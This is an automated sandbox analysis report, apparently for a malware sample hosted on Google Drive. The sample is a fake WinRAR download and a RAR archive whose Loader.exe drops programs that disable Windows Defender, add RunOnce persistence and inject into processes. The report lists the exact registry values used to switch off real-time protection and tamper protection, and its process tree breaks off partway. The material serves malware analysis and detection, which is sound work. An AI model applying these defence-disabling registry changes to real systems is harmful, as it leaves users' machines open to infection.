hxxps://drive[.]google[.]com/file/d/1FYhz3lYVkWA1X3wwXg3qYOWgWRPHlRJx/view?usp=sharing

Analysis

max time kernel
216s
max time network
210s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2024 19:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/1FYhz3lYVkWA1X3wwXg3qYOWgWRPHlRJx/view?usp=sharing

Score

10^/10

discovery evasion execution persistence trojan

Malware Config

Signatures

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	disable.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	disable.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	disable.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	disable.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
892	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
3336	winrar-x64-701.exe
4352	winrar-x64-701.exe
5156	Loader.exe
5824	disable.exe
5016	disable.exe
3660	eos.exe
4188	FprSpread.exe
100	Loader.exe
4780	disable.exe
1816	disable.exe
1072	eos.exe
4336	FprSpread.exe
5380	eos.exe
2556	eos.exe

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	disable.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	disable.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	disable.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	disable.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	disable.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	disable.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	disable.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	disable.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	disable.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	disable.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	eos.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	eos.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
12	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
5156	Loader.exe
5156	Loader.exe
100	Loader.exe
100	Loader.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4336 set thread context of 5356	4336	FprSpread.exe	176

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	OpenWith.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 318527.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4872	msedge.exe
4872	msedge.exe
5112	msedge.exe
5112	msedge.exe
5068	identity_helper.exe
5068	identity_helper.exe
5428	msedge.exe
5428	msedge.exe
6032	msedge.exe
6032	msedge.exe
5636	msedge.exe
5636	msedge.exe
5636	msedge.exe
5636	msedge.exe
5156	Loader.exe
5156	Loader.exe
5824	disable.exe
5824	disable.exe
5016	disable.exe
5016	disable.exe
100	Loader.exe
100	Loader.exe
4780	disable.exe
4780	disable.exe
1816	disable.exe
1816	disable.exe
892	powershell.exe
892	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5576	OpenWith.exe
5140	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	5140	7zFM.exe
Token: 35	5140	7zFM.exe
Token: SeSecurityPrivilege	5140	7zFM.exe
Token: SeDebugPrivilege	5824	disable.exe
Token: SeImpersonatePrivilege	5824	disable.exe
Token: SeDebugPrivilege	4188	FprSpread.exe
Token: SeDebugPrivilege	4780	disable.exe
Token: SeImpersonatePrivilege	4780	disable.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	4336	FprSpread.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5140	7zFM.exe
5140	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe

Suspicious use of SetWindowsHookEx 25 IoCs

pid	Process
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
5576	OpenWith.exe
3336	winrar-x64-701.exe
3336	winrar-x64-701.exe
3336	winrar-x64-701.exe
4352	winrar-x64-701.exe
4352	winrar-x64-701.exe
4352	winrar-x64-701.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5112 wrote to memory of 4640	5112	msedge.exe	83
PID 5112 wrote to memory of 4640	5112	msedge.exe	83
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 1996	5112	msedge.exe	84
PID 5112 wrote to memory of 4872	5112	msedge.exe	85
PID 5112 wrote to memory of 4872	5112	msedge.exe	85
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86
PID 5112 wrote to memory of 2140	5112	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.google.com/file/d/1FYhz3lYVkWA1X3wwXg3qYOWgWRPHlRJx/view?usp=sharing
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3fda46f8,0x7ffe3fda4708,0x7ffe3fda4718
  2⤵
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:1996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:2140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3988 /prefetch:8
  2⤵
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3988 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
  2⤵
  PID:2440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5620 /prefetch:8
  2⤵
  PID:5288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4176 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
  2⤵
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
  2⤵
  PID:6028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
  2⤵
  PID:5592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3660 /prefetch:8
  2⤵
  PID:3956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6032
- C:\Users\Admin\Downloads\winrar-x64-701.exe
  "C:\Users\Admin\Downloads\winrar-x64-701.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2223360862574118448,17423950562120881657,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4764 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5636

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1624

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4332

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5576

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\4a0e3d35ac864e89818c0033560cf8ee /t 4004 /p 3336
1⤵
PID:1104

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3816

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4352

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\2cc8545e8b714d25904cefd658e974f5 /t 4364 /p 4352
1⤵
PID:3896

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EngineControl.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5140

C:\Users\Admin\Desktop\Loader.exe
"C:\Users\Admin\Desktop\Loader.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5156
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\disable.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\disable.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5824
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\disable.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\disable.exe
    3⤵
    - Modifies security service
    - Executes dropped EXE
    - Windows security modification
    - Suspicious behavior: EnumeratesProcesses
    PID:5016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c pause
      4⤵
      PID:1284
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eos.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eos.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3660
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FprSpread.exe
